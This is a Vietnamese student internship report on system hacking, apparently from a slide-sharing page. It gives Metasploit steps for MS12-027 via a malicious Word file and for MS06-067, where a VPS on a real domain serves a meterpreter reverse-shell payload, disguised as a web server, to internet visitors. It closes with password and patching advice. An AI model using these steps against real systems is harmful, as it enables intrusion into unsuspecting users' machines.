SVTH: Bùi Thanh Dung
Hình 4.4.3 ms12_027 bước 3
- Bước 4:
 Use exploit/mutil/handler
 Và set LPORT lại: set LPORT 4442
Hình 4.4.4 ms12_027 bước 4
- Bước 5:
 đưa file word chứa mã độc vào trong thư mục /var/www , cấp quyền cho
thư mục đó có quyền chạy và start lại apache2.
 Cho phép máy victim có thể tải thư mục đó về máy quá trình xâm nhập
và gửi mã độc bắt đầu thực hiện.
27
SVTH: Bùi Thanh Dung
Hình 4.4.5 ms12_027 bước 5
- Bước 6:
 exploit lỗi và lắng nghe, chờ đợi máy victim download và open file word
và gửi máy độc tới máy victim.
 Tấn công thành công
 Máy có thể gửi mail hay một cách nào lừa victim truy cập vào link
192.168.1.15/office.doc
 Sau khi victim truy cập đường link trên và hiện ra một thông báo và tải
file .doc về máy.
 Chú ý: chỉ khi nào open file .doc đó thì khi đó mới có thể từ backtrack gửi
mã độc tới victim được.
28
SVTH: Bùi Thanh Dung
Hình 4.4.6 ms12_027 bước 6
Kiểm tra quá trình tấn công trên bactrack
Dùng shell để đứng trên desktop của victim
Giờ ta tạo một thư mục trên desktop của victim bằng câu lệnh mkdir abc kiểm tra thử trên
desktop của victim thử.
29
SVTH: Bùi Thanh Dung
Hình 4.4.6 ms12_027 bước 6a
Hình 4.4.6 ms12_027 bước 6b
Sau kiểm tra ta cũng thấy thư mục abc được tạo thành công. Quá trình tấn công thành công.
Giờ thì có thể thực hiện được ý đồ mà ta muốn.
30
SVTH: Bùi Thanh Dung
CHƯƠNG 3: XÂY DỰNG HONEYPOT KHAI THÁC XÂM NHẬP LỖ HỔNG TỪ
XA QUA MẠNG INTERNET
1. Máy chủ ảo VPS
1.1. Định nghĩa
Máychủ ảo (Virtual Private Server -VPS) làphươngphápphân chiamột máy chủ vật lý
thành nhiều máy chủ ảo. Trong khi trên một server chạy một Share Host thì có thể có
hàng trăm tài khoản chạy cùng lúc, nhưng trênserver chạyVPS thì con số này chỉ bằng
1/10. Do vậy, VPS có hiệu năng cao hơn Share Host rất nhiều.
Mỗi máychủ là một hệ thống hoàntoànriêngbiệt, có hệ điềuhànhriêng, có toàn quyền
quản lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạnchế100%khả
năng bị hack local.
Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên
server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến các
Website khác cùng server, riêngserver VPS, một tài khoản trên VPS bị tấn công thì mọi
tài khoản khác trên VPS đều hoạt động bình thường.
VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn nặng, nếu
chạy trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi người sử
dụng phải có thêm một số kiến thức về bảo mật, cấu hình server,.
1.2. Đặc điểm về thông số VPS
Hoạt độnghoàntoànnhư mộtserverriêngnênsở hữu mộtphần CPU riêng,dung lượng
RAM riêng, dung lượng ổHDD riêng, địa chỉ IP và hệ điều hành riêng.
Tiết kiệm được nhiều chi phí so với việc thuê một server riêng.
Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng
khác thì có thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web bằng trình
duyệt Web trên VPS, dowload/upload bittorrent với tốc độ cao
Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên
mà không cần phải khởi động lại hệ thống.
2. Honeypot
31
SVTH: Bùi Thanh Dung
Honeypot là một hệ thống tài nguyên thông tin được xây dựng với mục đích giả dạng
đánh lừa những kẻ sử dụng và xâm nhập không hợp pháp, thu hút sự chú ý của
chúng, ngăn không cho chúng tiếp xúc với hệ thống thật. Hệ thống tài nguyên thông
tin có nghĩa là Honeypot có thể giả dạng bất cứ loại máy chủ tài nguyên nào như là
Mail Server, Domain Name Server, Web Server… Honeypot sẽ trực tiếp tương tác
với tin tặc và tìm cách khai thác thông tin về tin tặc như hình thức tấn công, công cụ
tấn công hay cách thức tiến hành thay vì bị tấn công. Với mục tiêu xây dựng
Honeypot để xâm nhập vào lỗ hổng hệ thống máy tính qua Internet, Hacker có thể
sử dụng Máy chủ ảo (VPS) và cài đặt Honeypot để giả dạng là một Web server bình
thường, từ đó đánh lừa máy nạn nhân khi một máy tính bất kỳ có kết nối Internet
truy cập vào địa chỉ mà VPS cung cấp.
3. Sơ đồ tổng quan sử dụng Honeypot xâm nhập từ xa thông qua internet
Hình 5: sơ đồ tổng quan sử dụng Honepot
Chúng ta – đóng vài trò là Attacker, cần chuẩn bị:
VPS có địa chỉ IP public, cài đặt sẵn công cụ Metasploit (download tại
http://metasploit.org) đóng vai trò là một Honeypot trên mạng.
32
SVTH: Bùi Thanh Dung
Hình 6: đã cài đặt thành công metasploit trên VPS
4. Tấn công trên internet
Lỗ hổng khai thác: Ms 06_067. Điều kiện: Windows XP without service pack, trình
duyệt Internet Explorer 6.0
Môtả:
 Là lỗi làm cho IE bị tràn bộ đệm, để có thể dựa vào đó mà tấn công và thực
hiện mã lệnh từ xa.
Hệ điềuhành bị ảnh hưởng:
 Windows XP Universal
 Windows 2000 Universal
 Windows Server 2003 Universal
33
SVTH: Bùi Thanh Dung
Tại cửa sổ Metasploit console, ta sử dụng các lệnh sau để tạo một server lắng nghe
các sự truy cập từ bên ngoài.
 use exploit/windows/browser/ms06_067_keyframe (Sử dụng lỗi Ms06_067)
 show options (Xem thông tin thiết đặt)
 set srvhost ptuananh.tk (VPS được đăng ký domain là http://ptuananh.tk )
 set lhost ptuananh.tk
 set uripath winxp (Đường dẫn kèm theo Domain, nếu để mặc định, metasploit
sẽ chọn ngẫu nhiên đường dẫn bất kỳ)
 set srvport 80 (Chọn port 80, VPS như một Web Server, tránh sự nghi ngờ
của người dùng)
 set payload windows/meterpreter/reverse_tcp
 exploit
Công việc tiếp theo là chờ cho máy mục tiêu truy cập vào địa chỉ:
http://ptuananh.tk/winxp . Ngay lúc đó, server trên VPS chúng ta sẽ tiến hành gửi
trojan về máy mục tiêu.
Hình 7: gửi Trojan về máy victim
Bây giờ ta tiến hành khai thác máy nạn nhân với mục đích trước khi tấn công
34
SVTH: Bùi Thanh Dung
Hình 8: khai thác thông tin từ máy victim
35
SVTH: Bùi Thanh Dung
CHƯƠNG 4: TỔNG KẾT
Với những kiểu tấn công hệ thống dựa trên những lỗi sai sót trong quá trình sử dụng máy
tính hoặc các lỗi về bảo mật vật lý, có một số phương pháp nhằm giảm thiểu và phòng tránh
việc Hacker đánh cắp Mật khẩu như sau:
Mật khẩu phải được đặt nhiều hơn 8 ký tự và phải là tổng hợp giữa chữ hoa, chữ thường,
số và ký tự đặc biệt để các chương trình khó dò ra.
Cấu hình trong registry cho mật khẩu trong hệ thống windows chỉ được băm và lưu dưới
dạng NTLM để các chương trình khó khăn để dò tim. Bật lên 1 ở khóa:
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaNoLMHash
Người dùng admin nên xóa tập tin sam trong thư mục Windows/repair sau mỗi lần backup
dữ liệu bằng rdisk.
Trong quá trình sử dụng máy tính để truy cập Internet, người dùng cần lưu ý:
Không mở tập tin đính kèm thư điện tử có nguồn gốc không rõ ràng hoặc không tin cậy.
Chắc chắn rằng bạn có và đã bật hệ thống tường lửa cho hệ thống của mình.
Đảm bảo Windows của bạn được cập nhật thường xuyên, phần mềm bảo mật của bạn có
chức năng cập nhật "live" (tự động cập nhật trực tuyến).
Microsoft đã xây dựng một loạt các công cụ trong Windows để các nhà quản trị cũng như
người dùng có kinh nghiệm có thể phân tích chiếc máy tính của mình xem liệu nó có đang
bị xâm phạm hay không. Một khi nghi ngờ máy tính của mình bị xâm nhập, người dùng có
thể sử dụng các công cụ này để tự kiểm tra máy tính của mình khi có những biểu hiện đáng
ngờ: WMIC, Lệnh net, Openfiles, Netstat, Find.
36
SVTH: Bùi Thanh Dung
TÀI LIỆU THAM KHẢO
Sử dụng BackTrack 5 khai thác lỗhổng mạng.
Tài liệu system hacking của Athena
Tài liệu hacker mũ trắng Athena
http://www.hackyshacky.com/2013/03/how-to-hack-facebook-with-backtrack-5.html
http://www.slideshare.net/Anhphailamthenao/bo-co-thc-tp-system-hacking?related=5
https://www.youtube.com/watch?v=g1Xo7K2osxE&list=PL6Elfw63yI9RVQLXsK_V7Xy
HmiJc_9v56
http://suamaytinhtainha.info/thu-thuat-may-tinh/cach-hack-may-tinh-trong-mang-lan-
bang-backtrack-5.html

Más contenido relacionado

La actualidad más candente

Bao cao thuc tap nhan thuc nguyen pham cong danh 104522-tc1011
Bao cao thuc tap nhan thuc   nguyen pham cong danh 104522-tc1011Bao cao thuc tap nhan thuc   nguyen pham cong danh 104522-tc1011
Bao cao thuc tap nhan thuc nguyen pham cong danh 104522-tc1011Lan Nguyễn
 
101052 ha thi thuy an
101052   ha thi thuy an101052   ha thi thuy an
101052 ha thi thuy anLan Nguyễn
 
Bao cao ttnt nguyen thilyuyen
Bao cao ttnt nguyen thilyuyenBao cao ttnt nguyen thilyuyen
Bao cao ttnt nguyen thilyuyenLan Nguyễn
 
Bao cao thuc tap tot nghiep tran ngoc kim thanh - 091075
Bao cao thuc tap tot nghiep tran ngoc kim thanh - 091075Bao cao thuc tap tot nghiep tran ngoc kim thanh - 091075
Bao cao thuc tap tot nghiep tran ngoc kim thanh - 091075Lan Nguyễn
 
Bao cao thuc tap nhan thuc mssv 104537
Bao cao thuc tap nhan thuc mssv 104537Bao cao thuc tap nhan thuc mssv 104537
Bao cao thuc tap nhan thuc mssv 104537Lan Nguyễn
 
Bao cao ttnt thai ba thanh 091879_kn0911
Bao cao ttnt thai ba thanh 091879_kn0911Bao cao ttnt thai ba thanh 091879_kn0911
Bao cao ttnt thai ba thanh 091879_kn0911Lan Nguyễn
 
Bao cao thuc tap kiet - 104633
Bao cao thuc tap   kiet - 104633Bao cao thuc tap   kiet - 104633
Bao cao thuc tap kiet - 104633Lan Nguyễn
 
104512 trần hoàng phương khanh
104512   trần hoàng phương khanh104512   trần hoàng phương khanh
104512 trần hoàng phương khanhLan Nguyễn
 
104662 nguyen thi quynh nga
104662   nguyen thi quynh nga104662   nguyen thi quynh nga
104662 nguyen thi quynh ngaLan Nguyễn
 
Báo cáo thực tập ngành may chuẩn bị triển khai sản xuất tại tổng công ty may ...
Báo cáo thực tập ngành may chuẩn bị triển khai sản xuất tại tổng công ty may ...Báo cáo thực tập ngành may chuẩn bị triển khai sản xuất tại tổng công ty may ...
Báo cáo thực tập ngành may chuẩn bị triển khai sản xuất tại tổng công ty may ...https://www.facebook.com/garmentspace
 
Hướng dẫn viết báo cáo thực tập ngành ngôn ngữ anh trường đh công nghiệp tphc...
Hướng dẫn viết báo cáo thực tập ngành ngôn ngữ anh trường đh công nghiệp tphc...Hướng dẫn viết báo cáo thực tập ngành ngôn ngữ anh trường đh công nghiệp tphc...
Hướng dẫn viết báo cáo thực tập ngành ngôn ngữ anh trường đh công nghiệp tphc...Viết thuê báo cáo thực tập giá rẻ
 
[Đại học Hoa Sen] Báo cáo thực tập nhận thức
[Đại học Hoa Sen] Báo cáo thực tập nhận thức[Đại học Hoa Sen] Báo cáo thực tập nhận thức
[Đại học Hoa Sen] Báo cáo thực tập nhận thứcVu Huy
 
Bao cao thuc tap tran nguyen bao khanh
Bao cao thuc tap  tran nguyen bao khanhBao cao thuc tap  tran nguyen bao khanh
Bao cao thuc tap tran nguyen bao khanhLan Nguyễn
 
đồ áN ngành may tìm hiểu quy trình công tác kiểm tra chất lượng quần tại cô...
đồ áN ngành may   tìm hiểu quy trình công tác kiểm tra chất lượng quần tại cô...đồ áN ngành may   tìm hiểu quy trình công tác kiểm tra chất lượng quần tại cô...
đồ áN ngành may tìm hiểu quy trình công tác kiểm tra chất lượng quần tại cô...TÀI LIỆU NGÀNH MAY
 
đồ áN theo dõi dòng chảy và chất lượng sản phẩm trong khâu hoàn thành tại xí ...
đồ áN theo dõi dòng chảy và chất lượng sản phẩm trong khâu hoàn thành tại xí ...đồ áN theo dõi dòng chảy và chất lượng sản phẩm trong khâu hoàn thành tại xí ...
đồ áN theo dõi dòng chảy và chất lượng sản phẩm trong khâu hoàn thành tại xí ...TÀI LIỆU NGÀNH MAY
 
Đề tài: Một số giải pháp nâng cao chất lượng dịch vụ phòng tại khách sạn Sign...
Đề tài: Một số giải pháp nâng cao chất lượng dịch vụ phòng tại khách sạn Sign...Đề tài: Một số giải pháp nâng cao chất lượng dịch vụ phòng tại khách sạn Sign...
Đề tài: Một số giải pháp nâng cao chất lượng dịch vụ phòng tại khách sạn Sign...Viết thuê trọn gói ZALO 0934573149
 

La actualidad más candente (20)

Bao cao thuc tap nhan thuc nguyen pham cong danh 104522-tc1011
Bao cao thuc tap nhan thuc   nguyen pham cong danh 104522-tc1011Bao cao thuc tap nhan thuc   nguyen pham cong danh 104522-tc1011
Bao cao thuc tap nhan thuc nguyen pham cong danh 104522-tc1011
 
101052 ha thi thuy an
101052   ha thi thuy an101052   ha thi thuy an
101052 ha thi thuy an
 
Bao cao ttnt nguyen thilyuyen
Bao cao ttnt nguyen thilyuyenBao cao ttnt nguyen thilyuyen
Bao cao ttnt nguyen thilyuyen
 
Bao cao thuc tap tot nghiep tran ngoc kim thanh - 091075
Bao cao thuc tap tot nghiep tran ngoc kim thanh - 091075Bao cao thuc tap tot nghiep tran ngoc kim thanh - 091075
Bao cao thuc tap tot nghiep tran ngoc kim thanh - 091075
 
Bao cao thuc tap nhan thuc mssv 104537
Bao cao thuc tap nhan thuc mssv 104537Bao cao thuc tap nhan thuc mssv 104537
Bao cao thuc tap nhan thuc mssv 104537
 
Bao cao ttnt thai ba thanh 091879_kn0911
Bao cao ttnt thai ba thanh 091879_kn0911Bao cao ttnt thai ba thanh 091879_kn0911
Bao cao ttnt thai ba thanh 091879_kn0911
 
Bao cao thuc tap
Bao cao thuc tapBao cao thuc tap
Bao cao thuc tap
 
Bao cao thuc tap kiet - 104633
Bao cao thuc tap   kiet - 104633Bao cao thuc tap   kiet - 104633
Bao cao thuc tap kiet - 104633
 
104512 trần hoàng phương khanh
104512   trần hoàng phương khanh104512   trần hoàng phương khanh
104512 trần hoàng phương khanh
 
104662 nguyen thi quynh nga
104662   nguyen thi quynh nga104662   nguyen thi quynh nga
104662 nguyen thi quynh nga
 
Báo cáo thực tập ngành may chuẩn bị triển khai sản xuất tại tổng công ty may ...
Báo cáo thực tập ngành may chuẩn bị triển khai sản xuất tại tổng công ty may ...Báo cáo thực tập ngành may chuẩn bị triển khai sản xuất tại tổng công ty may ...
Báo cáo thực tập ngành may chuẩn bị triển khai sản xuất tại tổng công ty may ...
 
Hướng dẫn viết báo cáo thực tập ngành ngôn ngữ anh trường đh công nghiệp tphc...
Hướng dẫn viết báo cáo thực tập ngành ngôn ngữ anh trường đh công nghiệp tphc...Hướng dẫn viết báo cáo thực tập ngành ngôn ngữ anh trường đh công nghiệp tphc...
Hướng dẫn viết báo cáo thực tập ngành ngôn ngữ anh trường đh công nghiệp tphc...
 
[Đại học Hoa Sen] Báo cáo thực tập nhận thức
[Đại học Hoa Sen] Báo cáo thực tập nhận thức[Đại học Hoa Sen] Báo cáo thực tập nhận thức
[Đại học Hoa Sen] Báo cáo thực tập nhận thức
 
Bao cao thuc tap tran nguyen bao khanh
Bao cao thuc tap  tran nguyen bao khanhBao cao thuc tap  tran nguyen bao khanh
Bao cao thuc tap tran nguyen bao khanh
 
CÔNG VIỆC TRỢ GIẢNG TẠI TRUNG TÂM NHẬT NGỮ THÀNH CÔNG (TẢI FREE ZALO: 093 4...
 CÔNG VIỆC TRỢ GIẢNG TẠI TRUNG TÂM  NHẬT NGỮ THÀNH CÔNG (TẢI FREE ZALO: 093 4... CÔNG VIỆC TRỢ GIẢNG TẠI TRUNG TÂM  NHẬT NGỮ THÀNH CÔNG (TẢI FREE ZALO: 093 4...
CÔNG VIỆC TRỢ GIẢNG TẠI TRUNG TÂM NHẬT NGỮ THÀNH CÔNG (TẢI FREE ZALO: 093 4...
 
Đề tài thực trạng hoạt động xuất nhập khẩu công ty điện tử điểm cao
Đề tài  thực trạng hoạt động xuất nhập khẩu công ty điện tử  điểm caoĐề tài  thực trạng hoạt động xuất nhập khẩu công ty điện tử  điểm cao
Đề tài thực trạng hoạt động xuất nhập khẩu công ty điện tử điểm cao
 
đồ áN ngành may tìm hiểu quy trình công tác kiểm tra chất lượng quần tại cô...
đồ áN ngành may   tìm hiểu quy trình công tác kiểm tra chất lượng quần tại cô...đồ áN ngành may   tìm hiểu quy trình công tác kiểm tra chất lượng quần tại cô...
đồ áN ngành may tìm hiểu quy trình công tác kiểm tra chất lượng quần tại cô...
 
đồ áN theo dõi dòng chảy và chất lượng sản phẩm trong khâu hoàn thành tại xí ...
đồ áN theo dõi dòng chảy và chất lượng sản phẩm trong khâu hoàn thành tại xí ...đồ áN theo dõi dòng chảy và chất lượng sản phẩm trong khâu hoàn thành tại xí ...
đồ áN theo dõi dòng chảy và chất lượng sản phẩm trong khâu hoàn thành tại xí ...
 
Đề tài: Một số giải pháp nâng cao chất lượng dịch vụ phòng tại khách sạn Sign...
Đề tài: Một số giải pháp nâng cao chất lượng dịch vụ phòng tại khách sạn Sign...Đề tài: Một số giải pháp nâng cao chất lượng dịch vụ phòng tại khách sạn Sign...
Đề tài: Một số giải pháp nâng cao chất lượng dịch vụ phòng tại khách sạn Sign...
 
Baocaothuctapv1
Baocaothuctapv1Baocaothuctapv1
Baocaothuctapv1
 

Destacado

Umfrage Urlaubsgrüße
Umfrage UrlaubsgrüßeUmfrage Urlaubsgrüße
Umfrage UrlaubsgrüßeLTUR_Presse
 
Umfrage Flirten im Ulraub
Umfrage Flirten im UlraubUmfrage Flirten im Ulraub
Umfrage Flirten im UlraubLTUR_Presse
 
Vedran Puclin diploma eng
Vedran Puclin diploma engVedran Puclin diploma eng
Vedran Puclin diploma engVedran Puclin
 
11_LeThiThuyDung.mul1
11_LeThiThuyDung.mul111_LeThiThuyDung.mul1
11_LeThiThuyDung.mul1Dung Le
 
11 le thithuydung.mul1
11 le thithuydung.mul111 le thithuydung.mul1
11 le thithuydung.mul1Dung Le
 
Are You a Victim of Sexual Harassment in the Workplace?
Are You a Victim of Sexual Harassment in the Workplace?Are You a Victim of Sexual Harassment in the Workplace?
Are You a Victim of Sexual Harassment in the Workplace?Curley & Rothman, LLC
 
britishpaints-social-media-case-study
britishpaints-social-media-case-studybritishpaints-social-media-case-study
britishpaints-social-media-case-studyGarima Mathur
 
קיימות וטביעת רגל פחמנית- ראיון במגזין כיל הגלובלי- ינואר 16
קיימות וטביעת רגל פחמנית- ראיון במגזין כיל הגלובלי- ינואר 16קיימות וטביעת רגל פחמנית- ראיון במגזין כיל הגלובלי- ינואר 16
קיימות וטביעת רגל פחמנית- ראיון במגזין כיל הגלובלי- ינואר 16Roy Weidberg
 
Can You Qualify for Low Income Housing Tax Credits: A Guide for Land Developr...
Can You Qualify for Low Income Housing Tax Credits: A Guide for Land Developr...Can You Qualify for Low Income Housing Tax Credits: A Guide for Land Developr...
Can You Qualify for Low Income Housing Tax Credits: A Guide for Land Developr...Curley & Rothman, LLC
 
ALEJE.IT #7 // 18.04.2015 // ALEKSANDRA HINC
ALEJE.IT #7 // 18.04.2015 // ALEKSANDRA HINCALEJE.IT #7 // 18.04.2015 // ALEKSANDRA HINC
ALEJE.IT #7 // 18.04.2015 // ALEKSANDRA HINCALEJE.IT
 
START alert Nigeria (Lassa fever)
START alert Nigeria (Lassa fever)START alert Nigeria (Lassa fever)
START alert Nigeria (Lassa fever)Lylaa Shaikh
 

Destacado (15)

Umfrage Urlaubsgrüße
Umfrage UrlaubsgrüßeUmfrage Urlaubsgrüße
Umfrage Urlaubsgrüße
 
Umfrage Flirten im Ulraub
Umfrage Flirten im UlraubUmfrage Flirten im Ulraub
Umfrage Flirten im Ulraub
 
Vedran Puclin diploma eng
Vedran Puclin diploma engVedran Puclin diploma eng
Vedran Puclin diploma eng
 
11_LeThiThuyDung.mul1
11_LeThiThuyDung.mul111_LeThiThuyDung.mul1
11_LeThiThuyDung.mul1
 
11 le thithuydung.mul1
11 le thithuydung.mul111 le thithuydung.mul1
11 le thithuydung.mul1
 
Ranbaranage Lakshman Silva
Ranbaranage Lakshman SilvaRanbaranage Lakshman Silva
Ranbaranage Lakshman Silva
 
Profile_Hadoop
Profile_HadoopProfile_Hadoop
Profile_Hadoop
 
Are You a Victim of Sexual Harassment in the Workplace?
Are You a Victim of Sexual Harassment in the Workplace?Are You a Victim of Sexual Harassment in the Workplace?
Are You a Victim of Sexual Harassment in the Workplace?
 
Resume (1)
Resume (1)Resume (1)
Resume (1)
 
britishpaints-social-media-case-study
britishpaints-social-media-case-studybritishpaints-social-media-case-study
britishpaints-social-media-case-study
 
קיימות וטביעת רגל פחמנית- ראיון במגזין כיל הגלובלי- ינואר 16
קיימות וטביעת רגל פחמנית- ראיון במגזין כיל הגלובלי- ינואר 16קיימות וטביעת רגל פחמנית- ראיון במגזין כיל הגלובלי- ינואר 16
קיימות וטביעת רגל פחמנית- ראיון במגזין כיל הגלובלי- ינואר 16
 
Can You Qualify for Low Income Housing Tax Credits: A Guide for Land Developr...
Can You Qualify for Low Income Housing Tax Credits: A Guide for Land Developr...Can You Qualify for Low Income Housing Tax Credits: A Guide for Land Developr...
Can You Qualify for Low Income Housing Tax Credits: A Guide for Land Developr...
 
ALEJE.IT #7 // 18.04.2015 // ALEKSANDRA HINC
ALEJE.IT #7 // 18.04.2015 // ALEKSANDRA HINCALEJE.IT #7 // 18.04.2015 // ALEKSANDRA HINC
ALEJE.IT #7 // 18.04.2015 // ALEKSANDRA HINC
 
START alert Nigeria (Lassa fever)
START alert Nigeria (Lassa fever)START alert Nigeria (Lassa fever)
START alert Nigeria (Lassa fever)
 
Question 3
Question 3Question 3
Question 3
 

Similar a báo cáo thực tập cuối khóa Athena-system hacking- Bùi Thanh Dung

Nghiên cứu cơ chế routing của Cisco, mô phỏng trên nền GNS3
Nghiên cứu cơ chế routing của Cisco, mô phỏng trên nền GNS3Nghiên cứu cơ chế routing của Cisco, mô phỏng trên nền GNS3
Nghiên cứu cơ chế routing của Cisco, mô phỏng trên nền GNS3phamvotuanthanh
 
Bao cao thuc tap tran thanhtrung mssv 1031103002
Bao cao thuc tap tran thanhtrung mssv 1031103002Bao cao thuc tap tran thanhtrung mssv 1031103002
Bao cao thuc tap tran thanhtrung mssv 1031103002Trung Tran
 
De tai bao cao ket qua thuc tap cua Thanh Hung - Trung tam Athena
De tai bao cao ket qua thuc tap cua Thanh Hung - Trung tam AthenaDe tai bao cao ket qua thuc tap cua Thanh Hung - Trung tam Athena
De tai bao cao ket qua thuc tap cua Thanh Hung - Trung tam Athenagiolanh1204
 
Thanh trang bctt
Thanh trang   bcttThanh trang   bctt
Thanh trang bcttKem Dâu
 
Báo cáo thực tập
Báo cáo thực tậpBáo cáo thực tập
Báo cáo thực tậpthanhhauuit
 
Nguyenthithuhien_baocaothuctap
Nguyenthithuhien_baocaothuctapNguyenthithuhien_baocaothuctap
Nguyenthithuhien_baocaothuctapThu Hien
 
BaocaoThuctap
BaocaoThuctapBaocaoThuctap
BaocaoThuctapLuu Hung
 
Baocaothuctap
BaocaothuctapBaocaothuctap
BaocaothuctapLuu Hung
 
Baocaotrungtam
BaocaotrungtamBaocaotrungtam
BaocaotrungtamLuu Hung
 
Thuc tap tot nghiep
Thuc tap tot  nghiepThuc tap tot  nghiep
Thuc tap tot nghiepthanhhauuit
 
Bao cao thuc tap gk
Bao cao thuc tap gkBao cao thuc tap gk
Bao cao thuc tap gkice_eyes
 
Báo cáo thực tập
Báo cáo thực tậpBáo cáo thực tập
Báo cáo thực tậptuankiet123
 
Baocaothuctap
BaocaothuctapBaocaothuctap
Baocaothuctapcuong030
 
Báo cáo thực tập Athena - CNTT
Báo cáo thực tập Athena - CNTTBáo cáo thực tập Athena - CNTT
Báo cáo thực tập Athena - CNTTVu Tran
 

Similar a báo cáo thực tập cuối khóa Athena-system hacking- Bùi Thanh Dung (20)

Nghiên cứu cơ chế routing của Cisco, mô phỏng trên nền GNS3
Nghiên cứu cơ chế routing của Cisco, mô phỏng trên nền GNS3Nghiên cứu cơ chế routing của Cisco, mô phỏng trên nền GNS3
Nghiên cứu cơ chế routing của Cisco, mô phỏng trên nền GNS3
 
Bao cao thuc tap tran thanhtrung mssv 1031103002
Bao cao thuc tap tran thanhtrung mssv 1031103002Bao cao thuc tap tran thanhtrung mssv 1031103002
Bao cao thuc tap tran thanhtrung mssv 1031103002
 
De tai bao cao ket qua thuc tap cua Thanh Hung - Trung tam Athena
De tai bao cao ket qua thuc tap cua Thanh Hung - Trung tam AthenaDe tai bao cao ket qua thuc tap cua Thanh Hung - Trung tam Athena
De tai bao cao ket qua thuc tap cua Thanh Hung - Trung tam Athena
 
Thanh trang bctt
Thanh trang   bcttThanh trang   bctt
Thanh trang bctt
 
Báo cáo thực tập
Báo cáo thực tậpBáo cáo thực tập
Báo cáo thực tập
 
Nguyenthithuhien_baocaothuctap
Nguyenthithuhien_baocaothuctapNguyenthithuhien_baocaothuctap
Nguyenthithuhien_baocaothuctap
 
BaocaoThuctap
BaocaoThuctapBaocaoThuctap
BaocaoThuctap
 
Baocaothuctap
BaocaothuctapBaocaothuctap
Baocaothuctap
 
Baocaotrungtam
BaocaotrungtamBaocaotrungtam
Baocaotrungtam
 
Thuc tap tot nghiep
Thuc tap tot  nghiepThuc tap tot  nghiep
Thuc tap tot nghiep
 
BAO.CAO.CUOI.KY
BAO.CAO.CUOI.KYBAO.CAO.CUOI.KY
BAO.CAO.CUOI.KY
 
Báo cáo thực tập Athena
Báo cáo thực tập AthenaBáo cáo thực tập Athena
Báo cáo thực tập Athena
 
Bao cao thuc tap gk
Bao cao thuc tap gkBao cao thuc tap gk
Bao cao thuc tap gk
 
Khóa luận: Hoàn thiện công tác đào tạo nguồn nhân lực tại Công ty, 9 ĐIỂM
Khóa luận: Hoàn thiện công tác đào tạo nguồn nhân lực tại Công ty, 9 ĐIỂMKhóa luận: Hoàn thiện công tác đào tạo nguồn nhân lực tại Công ty, 9 ĐIỂM
Khóa luận: Hoàn thiện công tác đào tạo nguồn nhân lực tại Công ty, 9 ĐIỂM
 
Hoàn Thiện Chiến Lược Marketing Mix Tại Công Ty Bảo Hiểm Nhân Thọ Huế.docx
Hoàn Thiện Chiến Lược Marketing Mix Tại Công Ty Bảo Hiểm Nhân Thọ Huế.docxHoàn Thiện Chiến Lược Marketing Mix Tại Công Ty Bảo Hiểm Nhân Thọ Huế.docx
Hoàn Thiện Chiến Lược Marketing Mix Tại Công Ty Bảo Hiểm Nhân Thọ Huế.docx
 
bao_cao_athena_cuoi_ki_thuc_tap
bao_cao_athena_cuoi_ki_thuc_tapbao_cao_athena_cuoi_ki_thuc_tap
bao_cao_athena_cuoi_ki_thuc_tap
 
Báo cáo thực tập
Báo cáo thực tậpBáo cáo thực tập
Báo cáo thực tập
 
Baocaothuctap
BaocaothuctapBaocaothuctap
Baocaothuctap
 
Đánh giá hiệu quả marketing online sản phẩm Ereka, của trung tâm không gian m...
Đánh giá hiệu quả marketing online sản phẩm Ereka, của trung tâm không gian m...Đánh giá hiệu quả marketing online sản phẩm Ereka, của trung tâm không gian m...
Đánh giá hiệu quả marketing online sản phẩm Ereka, của trung tâm không gian m...
 
Báo cáo thực tập Athena - CNTT
Báo cáo thực tập Athena - CNTTBáo cáo thực tập Athena - CNTT
Báo cáo thực tập Athena - CNTT
 

Último

Kiểm tra cuối học kì 1 sinh học 12 đề tham khảo
Kiểm tra cuối học kì 1 sinh học 12 đề tham khảoKiểm tra cuối học kì 1 sinh học 12 đề tham khảo
Kiểm tra cuối học kì 1 sinh học 12 đề tham khảohoanhv296
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...Nguyen Thanh Tu Collection
 
SÁNG KIẾN ÁP DỤNG CLT (COMMUNICATIVE LANGUAGE TEACHING) VÀO QUÁ TRÌNH DẠY - H...
SÁNG KIẾN ÁP DỤNG CLT (COMMUNICATIVE LANGUAGE TEACHING) VÀO QUÁ TRÌNH DẠY - H...SÁNG KIẾN ÁP DỤNG CLT (COMMUNICATIVE LANGUAGE TEACHING) VÀO QUÁ TRÌNH DẠY - H...
SÁNG KIẾN ÁP DỤNG CLT (COMMUNICATIVE LANGUAGE TEACHING) VÀO QUÁ TRÌNH DẠY - H...Nguyen Thanh Tu Collection
 
cac-cau-noi-tthcm.pdf-cac-cau-noi-tthcm-
cac-cau-noi-tthcm.pdf-cac-cau-noi-tthcm-cac-cau-noi-tthcm.pdf-cac-cau-noi-tthcm-
cac-cau-noi-tthcm.pdf-cac-cau-noi-tthcm-KhnhHuyn546843
 
sách sinh học đại cương - Textbook.pdf
sách sinh học đại cương   -   Textbook.pdfsách sinh học đại cương   -   Textbook.pdf
sách sinh học đại cương - Textbook.pdfTrnHoa46
 
PHƯƠNG THỨC VẬN TẢI ĐƯỜNG SẮT TRONG VẬN TẢI
PHƯƠNG THỨC VẬN TẢI ĐƯỜNG SẮT TRONG VẬN TẢIPHƯƠNG THỨC VẬN TẢI ĐƯỜNG SẮT TRONG VẬN TẢI
